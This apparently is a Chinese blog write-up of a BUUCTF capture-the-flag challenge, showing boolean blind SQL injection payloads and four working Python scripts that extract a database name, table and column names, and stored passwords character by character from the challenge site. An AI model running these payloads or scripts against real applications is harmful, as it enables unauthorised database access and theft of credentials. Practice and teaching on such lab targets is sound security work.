sql盲注有回显的简单脚本

我们在SQL注入的时候如果发现是盲注,手工注入特别费时间。
就需要写一个简单脚本。下面就介绍一下自己的脚本。
借用buuctf-极客大挑战-finalsql的一道题。

当我们构造好了payload之后就直接用脚本
查询database
payload:

1^(ascii(substr((select(database())),1,1))>1)^1

在之前需要自己手工判断database()的长度

1^(length(database())=4)^1

database脚本:

#-*-codeing = utf-8 -*-
#@Author: Firebasky
import requests as req

url = "http://aa85fe53-92e5-4f8a-aced-2b1f8cf87850.node3.buuoj.cn/search.php?id="

result= ''

for i in range(1,5):
    for j in range(32,128):
        payload = '1^(ascii(substr((select(database())),'+str(i)+',1))>'+str(j)+')^1'
        print(payload)
        r = req.get(url+payload)
        
        if r.text.find('Click')== -1:
            result +=chr(j)
            print(j)
            break
                       
print(result)
#database()=geek

接下来就是获得table
payload:

id=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema="geek")),1,1))>1)^1

table脚本:

#-*-codeing = utf-8 -*-
#@Author: Firebasky
import requests as req

url = "http://aa85fe53-92e5-4f8a-aced-2b1f8cf87850.node3.buuoj.cn/search.php?id="

result= ''

for i in range(1,8):
    for j in range(32,128):
        payload = '1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema="geek")),'+str(i)+',1))>'+str(j)+')^1'                                                                   
        print(payload)
        r = req.get(url+payload)
        
        if r.text.find('Click')== -1:
            result +=chr(j)
            print(j)
            break
                       
print(result)
##table_name=F1naI1y

在下面就是获得column
payload:

id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="F1naI1y")),1,1))>1)^1

column脚本

#-*-codeing = utf-8 -*-
#@Author: Firebasky
import requests as req

url = "http://aa85fe53-92e5-4f8a-aced-2b1f8cf87850.node3.buuoj.cn/search.php?id="

result= ''

for i in range(1,21):
    for j in range(32,128):
        payload = '1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="F1naI1y")),'+str(i)+',1))>'+str(j)+')^1'                                                                   
        print(payload)
        r = req.get(url+payload)
        
        if r.text.find('Click')== -1:
            result +=chr(j)
            print(j)
            break
                       
print(result) 
#id username password

在最后就是获得flag
payload:

id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)),1,1))>1)^1

flag脚本:

#-*-codeing = utf-8 -*-
#@Author: Firebasky
import requests as req

url = "http://aa85fe53-92e5-4f8a-aced-2b1f8cf87850.node3.buuoj.cn/search.php?id="

result= ''

for i in range(1,400):
    for j in range(32,128):
        payload = '1^(ascii(substr((select(group_concat(password))from(F1naI1y)),'+str(i)+',1))>'+str(j)+')^1'
        print(payload)
        r = req.get(url+payload)
        
        if r.text.find('Click')== -1:
            result +=chr(j)
            print(j)
            break
                       
print(result)
#flag{}

总结:
上面的脚本结构一样思路是先满足条件,当不满足条件的时候打印。
上面的脚本优点是特别简单,缺点是特别费时间。
下一篇我就介绍二分法脚本注入。

posted @ 2020-07-26 13:30  Firebasky  阅读(293)  评论(0)    收藏  举报